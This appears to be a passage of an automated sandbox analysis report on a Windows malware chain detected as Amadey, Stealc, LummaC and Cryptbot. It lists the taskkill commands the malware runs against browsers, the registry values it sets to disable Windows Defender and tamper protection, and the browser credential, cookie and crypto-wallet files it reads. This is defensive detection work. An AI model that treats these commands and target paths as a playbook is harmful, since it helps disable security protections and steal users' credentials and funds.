Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 86526d7b20.exe PID: 3428, type: MEMORYSTR
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe "C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe "C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe "C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe "C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe "C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: 9afe8d29fa.exe, 0000000C.00000002.2768066825.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 86526d7b20.exe, 86526d7b20.exe, 0000000A.00000002.2689532342.0000000001307000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: MProgram Manager
Source: firefox.exe, 00000019.00000002.2942835188.000000ADF41FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWi
Source: skotes.exe, skotes.exe, 00000002.00000002.1759513034.0000000000D32000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: |/Program Manager
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: 2235d4f703.exe, 00000009.00000003.2715582287.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2793038580.000000000122C000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2715780457.0000000001259000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2738474191.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2898379971.0000000001400000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.file.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.b40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.b40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1734319751.0000000000651000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1759436709.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1718718912.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1759412863.0000000000B41000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2286916639.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1719175764.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1693568536.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 9afe8d29fa.exe PID: 4500, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 2235d4f703.exe PID: 8096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2235d4f703.exe PID: 2132, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000020.00000002.2938363540.0000000000F31000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2949459984.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2849604282.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2637178904.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2688574615.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2689206036.0000000000F31000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 86526d7b20.exe PID: 3428, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 2235d4f703.exe String found in binary or memory: Wallets/Electrum
Source: 2235d4f703.exe String found in binary or memory: Wallets/ElectronCash
Source: 2235d4f703.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 2235d4f703.exe String found in binary or memory: window-state.json
Source: 2235d4f703.exe String found in binary or memory: ExodusWeb3
Source: 2235d4f703.exe String found in binary or memory: Wallets/Ethereum
Source: 2235d4f703.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2235d4f703.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
